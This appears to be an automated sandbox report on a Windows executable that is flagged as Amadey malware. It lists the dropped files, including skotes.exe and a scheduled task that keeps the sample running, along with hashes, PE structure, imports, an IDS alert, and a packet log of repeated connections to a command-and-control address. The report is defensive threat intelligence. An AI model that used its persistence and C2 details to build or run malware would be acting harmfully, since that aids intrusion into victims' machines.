Preview:	MDMP..a..... ..........f............T...............\...........p2..........T.......8...........T.......................................................................................................................eJ......d.......GenuineIntel............T..............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA21.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6326
Entropy (8bit):	3.726243881966701
Encrypted:	false
SSDEEP:	192:R6l7wVeJE868W7SYcQpBV89b4bZsf0ejm:R6lXJf6NSYcd4byfJ6
MD5:	2A3A887EF6A4CE81B87CA0F4189B3F7D
SHA1:	2D14291CC682419AC5BC315031D67A41258C41F8
SHA-256:	25DC11B3A5E5260371A29C3F6BB70DDCAC502031E5D084E0CF532F203071BB5D
SHA-512:	6BD9D55A224F88CA85010698F49372AFEECAD9555920A9FAF8DA35B1697359CB73FA2D3D797BB9337836322F596F56BDF61A1EB5D4135E8BBCD36A45AE212B1C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB1C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.4768824967469225
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjBYm8M4JgKFM+q8gBCVb1lUl9d:uIjfxI7j37VZJO/CVxlUl9d
MD5:	BE6362DD26EC347F437B9A3CC8147B50
SHA1:	0D8EB9CBC247761AEED9EEA08C2604B6081C6506
SHA-256:	5C3B9F5F5A99450A4543B3E6BD9BA78CDD65FCA3EFCDC831E6FB31CBE1C4A8C4
SHA-512:	E7B04168B4B924FACC02357DEE529E6DC71CF119DCF1AD12775F45D4FEC9964628B0DA34BB27101B94DE38A17BC1D6CFC2FE7BBF7C02B5DBDF9A5CA998FBFB47
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\p3aYwXKO5T.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	430592
Entropy (8bit):	7.128636818670187
Encrypted:	false
SSDEEP:	6144:GLRGetrMAw/3EMKdzVlUVBEtBDryn4Tz207FYc5Ri:G9VCAsSU4t5K4vLji
MD5:	0AE8B048945C6CED85DF3FB5AFA2BC0B
SHA1:	AF1862013BA627E94FBFA10DE4FC515FB42D91C0
SHA-256:	6E9637EEAF1EA43FC7850AD8CE3AC4BC2CFAB054439680F3C5BF60E1153A3581
SHA-512:	5956F438DD7421FE2A5A8532D467E48B2132AFEFA65713F71F25C9CC5D38CF73A5F7DCCD2C19734643BDFB52266B59FD2FDCC6937FEB648FEF23BE0B6D86F7C9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..!9l..v...$~..v...$o..v...$y..v.......v...v...v...$p..v...$n..v...$k..v..Rich.v..........PE..L....`.e................."...................@....@..........................P.......6.......................................X..P.... ...(...................................................T......@T..@............@...............................text...? .......".................. ..`.rdata...#...@...$...&..............@..@.data........p.......J..............@....tls.................b..............@....rsrc....(... ...*...h..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\p3aYwXKO5T.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\p3aYwXKO5T.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.3881023510937247
Encrypted:	false
SSDEEP:	6:BCTbfX7L1UEZ+lX1CGdKUe6tkHs+Zgty0lbctDt0:BCTb/7BQ1CGAFBZgtVYtDt0
MD5:	2BC408705B9712CB5DC478CB4D06F1BA
SHA1:	D0FAC633280A84BE85154618D3268A07FEC5A83B
SHA-256:	E5A64AF5617E050C38827A22F0F3833BF2A5AD08C7A94573EE4473D02A8CFB42
SHA-512:	3BBF06BB705CDB35103CF6AAA37E2C3FF94F9919D0FC52BA9B1C63A69152FDD824338AB0172E58722A22F50D1DDC542A669F5B6E963CF7644ECC14D245EB55EA
Malicious:	false
Preview:	.....VD.V..H...s%.b0F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0.................;.@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.374745826306402
Encrypted:	false
SSDEEP:	6144:MFVfpi6ceLP/9skLmb0yyWWSPtaJG8nAge35OlMMhA2AX4WABlguNYiL:8V1QyWWI/glMM6kF7yq
MD5:	37608A2A65F2F34C6F7652D002DB18FB
SHA1:	A9286590AB63B18150C2CDAC59CABB383C49EFDC
SHA-256:	5A9910CE3B2BAF40A8A77AA36C4BA72C289234F84FFCA90D918581923658F16C
SHA-512:	CF0C31CCF0A0D6F827D8898B146D43789FE70798C4F567CA9B79BADFBCA6F570D4C0A73FB3198361A6D499D5804030CE00F10213FFADF4D91D1D56741237C6ED
Malicious:	false
Preview:	regfP...P....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..V.................................................................................................................................................................................................................................................................................................................................................o;A.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.128636818670187
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	p3aYwXKO5T.exe
File size:	430'592 bytes
MD5:	0ae8b048945c6ced85df3fb5afa2bc0b
SHA1:	af1862013ba627e94fbfa10de4fc515fb42d91c0
SHA256:	6e9637eeaf1ea43fc7850ad8ce3ac4bc2cfab054439680f3c5bf60e1153a3581
SHA512:	5956f438dd7421fe2a5a8532d467e48b2132afefa65713f71f25c9cc5d38cf73a5f7dccd2c19734643bdfb52266b59fd2fdcc6937feb648fef23be0b6d86f7c9
SSDEEP:	6144:GLRGetrMAw/3EMKdzVlUVBEtBDryn4Tz207FYc5Ri:G9VCAsSU4t5K4vLji
TLSH:	0F946CB26EE47815EEA64B759F2996EC272FBC526F35928D3140FE0F18733A1C512312
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v..!9l..v...$~..v...$o..v...$y..v.......v...v...v...$p..v...$n..v...$k..v..Rich.v..........PE..L....`.e...........

File Icon


Icon Hash:	738733b18ba393e4

Static PE Info

General

Entrypoint:	0x40181e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65B66092 [Sun Jan 28 14:11:30 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f191e24764ac2972e2c40e13c71b6d0d

Entrypoint Preview

Instruction
call 00007F4E746ACF10h
jmp 00007F4E746A9F8Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00448928h], eax
mov dword ptr [00448924h], ecx
mov dword ptr [00448920h], edx
mov dword ptr [0044891Ch], ebx
mov dword ptr [00448918h], esi
mov dword ptr [00448914h], edi
mov word ptr [00448940h], ss
mov word ptr [00448934h], cs
mov word ptr [00448910h], ds
mov word ptr [0044890Ch], es
mov word ptr [00448908h], fs
mov word ptr [00448904h], gs
pushfd
pop dword ptr [00448938h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044892Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00448930h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044893Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00448878h], 00010001h
mov eax, dword ptr [00448930h]
mov dword ptr [0044882Ch], eax
mov dword ptr [00448820h], C0000409h
mov dword ptr [00448824h], 00000001h
mov eax, dword ptr [00447008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0044700Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000ECh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x458bc	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x142000	0x22880	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x45488	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x45440	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x44000	0x1c4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4203f	0x42200	9bce8bdb99129c9d6e4cae6949f5cc4c	False	0.9296025815217391	data	7.8957690389687345	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x44000	0x230c	0x2400	b36c7b4275c3665fa994ad985b58e06b	False	0.3627387152777778	data	5.5042736537209525	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x47000	0xf90c0	0x1800	f35696e56921379978a742cc21ceb3a8	False	0.1484375	data	1.6516566376046822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x141000	0x51d	0x600	d00a0884dfc2593613905d91d2ea3f37	False	0.015625	data	0.007830200398677895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x142000	0x22880	0x22a00	55aac24ef94fc3fffc9881bf83298423	False	0.38922890342960287	data	4.939560360567573	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x159af0	0x2	data			5.0
VEHESEHOJIZUGEGITASABEZOYIBEMOM	0x1596f0	0x3fa	ASCII text, with very long lines (1018), with no line terminators	Turkish	Turkey	0.6335952848722987
RT_CURSOR	0x159af8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_CURSOR	0x159c40	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x159d70	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x15c340	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_CURSOR	0x15d200	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x15d330	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x142c80	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5770255863539445
RT_ICON	0x143b28	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6525270758122743
RT_ICON	0x1443d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.7091013824884793
RT_ICON	0x144a98	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7528901734104047
RT_ICON	0x145000	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5309128630705394
RT_ICON	0x1475a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6355534709193246
RT_ICON	0x148650	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6516393442622951
RT_ICON	0x148fd8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7845744680851063
RT_ICON	0x1494b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3427505330490405
RT_ICON	0x14a360	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5401624548736462
RT_ICON	0x14ac08	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6163594470046083
RT_ICON	0x14b2d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6770231213872833
RT_ICON	0x14b838	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.43060165975103737
RT_ICON	0x14dde0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5163934426229508
RT_ICON	0x14e768	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5097517730496454
RT_ICON	0x14ec38	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39952025586353945
RT_ICON	0x14fae0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5604693140794224
RT_ICON	0x150388	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.619815668202765
RT_ICON	0x150a50	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6329479768786127
RT_ICON	0x150fb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.4530956848030019
RT_ICON	0x152060	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4426229508196721
RT_ICON	0x1529e8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4858156028368794
RT_ICON	0x152eb8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.3358208955223881
RT_ICON	0x153d60	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.40342960288808666
RT_ICON	0x154608	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.40380184331797236
RT_ICON	0x154cd0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.4111271676300578
RT_ICON	0x155238	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.175
RT_ICON	0x1577e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.19910881801125704
RT_ICON	0x158888	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.23442622950819672
RT_ICON	0x159210	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.2632978723404255
RT_STRING	0x15fab0	0x3d0	data			0.45901639344262296
RT_STRING	0x15fe80	0x6fa	data			0.4311310190369541
RT_STRING	0x160580	0x710	data			0.4258849557522124
RT_STRING	0x160c90	0x716	data			0.42998897464167585
RT_STRING	0x1613a8	0x6bc	data			0.42923433874709976
RT_STRING	0x161a68	0x796	data			0.4243048403707518
RT_STRING	0x162200	0x6cc	data			0.4298850574712644
RT_STRING	0x1628d0	0x6f8	data			0.4327354260089686
RT_STRING	0x162fc8	0x618	data			0.4442307692307692
RT_STRING	0x1635e0	0x6b2	data			0.4340723453908985
RT_STRING	0x163c98	0x6ca	data			0.43383199079401613
RT_STRING	0x164368	0x484	data			0.4619377162629758
RT_STRING	0x1647f0	0x8c	data			0.6
RT_GROUP_CURSOR	0x159c28	0x14	data			1.15
RT_GROUP_CURSOR	0x15c318	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x15d1e8	0x14	data			1.25
RT_GROUP_CURSOR	0x15f8d8	0x22	data			1.088235294117647
RT_GROUP_ICON	0x14ebd0	0x68	data	Turkish	Turkey	0.7019230769230769
RT_GROUP_ICON	0x159678	0x76	data	Turkish	Turkey	0.6779661016949152
RT_GROUP_ICON	0x149440	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x152e50	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x15f900	0x1b0	data			0.5995370370370371

Imports

DLL	Import
KERNEL32.dll	FillConsoleOutputCharacterA, GetConsoleAliasExesLengthA, OpenJobObjectA, QueryDosDeviceA, GetComputerNameW, SleepEx, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, ReadConsoleOutputA, GetPriorityClass, GetEnvironmentStrings, FatalAppExitW, SetSystemTimeAdjustment, HeapCreate, SetConsoleMode, GetFileAttributesW, GetModuleFileNameW, GetBinaryTypeW, SetConsoleTitleA, GetShortPathNameA, GetStdHandle, GetLastError, GetProcAddress, SearchPathA, GetCommandLineW, OpenWaitableTimerA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, MoveFileA, SetCommMask, FindAtomA, FoldStringA, WaitForMultipleObjects, CreatePipe, GetDefaultCommConfigA, GetModuleHandleA, FreeEnvironmentStringsW, BuildCommDCBA, PurgeComm, WaitForDebugEvent, SetCalendarInfoA, GlobalReAlloc, CopyFileExA, GetVolumeInformationW, CreateFileA, GetNumaHighestNodeNumber, DebugActiveProcess, HeapFree, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapSize, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, ReadFile, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
USER32.dll	GetUserObjectInformationW, SetFocus
ADVAPI32.dll	ObjectPrivilegeAuditAlarmA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-25T08:00:05.943627+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.8	49744	185.215.113.43	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 07:59:10.292960882 CEST	49718	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:10.298003912 CEST	80	49718	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:10.298146009 CEST	49718	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:10.298302889 CEST	49718	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:10.303029060 CEST	80	49718	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:11.026473045 CEST	80	49718	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:11.026580095 CEST	49718	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:12.544476032 CEST	49718	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:12.544711113 CEST	49719	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:12.549535990 CEST	80	49719	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:12.549623966 CEST	49719	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:12.549663067 CEST	80	49718	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:12.549741983 CEST	49718	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:12.549755096 CEST	49719	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:12.554538965 CEST	80	49719	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:13.244261980 CEST	80	49719	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:13.244406939 CEST	49719	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:14.875694990 CEST	49719	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:14.875969887 CEST	49721	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:14.880836010 CEST	80	49721	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:14.880852938 CEST	80	49719	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:14.880954981 CEST	49721	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:14.880970001 CEST	49719	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:14.881127119 CEST	49721	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:14.885957956 CEST	80	49721	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:15.590009928 CEST	80	49721	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:15.590101004 CEST	49721	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:17.091185093 CEST	49721	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:17.091500998 CEST	49722	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:17.096357107 CEST	80	49722	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:17.096463919 CEST	49722	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:17.096533060 CEST	80	49721	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:17.096587896 CEST	49721	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:17.096604109 CEST	49722	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:17.101427078 CEST	80	49722	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:17.810853004 CEST	80	49722	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:17.810945988 CEST	49722	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:19.435106993 CEST	49722	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:19.435420036 CEST	49723	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:19.440304995 CEST	80	49722	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:19.440346003 CEST	80	49723	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:19.440365076 CEST	49722	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:19.440409899 CEST	49723	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:19.440556049 CEST	49723	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:19.445445061 CEST	80	49723	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:20.139668941 CEST	80	49723	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:20.139750004 CEST	49723	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:21.653801918 CEST	49723	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:21.654206991 CEST	49724	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:21.658948898 CEST	80	49723	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:21.658987999 CEST	80	49724	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:21.659056902 CEST	49723	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:21.659128904 CEST	49724	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:21.659343958 CEST	49724	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:21.664103031 CEST	80	49724	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:22.371007919 CEST	80	49724	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:22.371072054 CEST	49724	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:23.999675035 CEST	49724	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:23.999969006 CEST	49725	80	192.168.2.8	185.215.113.43
Sep 25, 2024 07:59:24.004982948 CEST	80	49725	185.215.113.43	192.168.2.8
Sep 25, 2024 07:59:24.005006075 CEST	80	49724	185.215.113.43	192.168.2.8
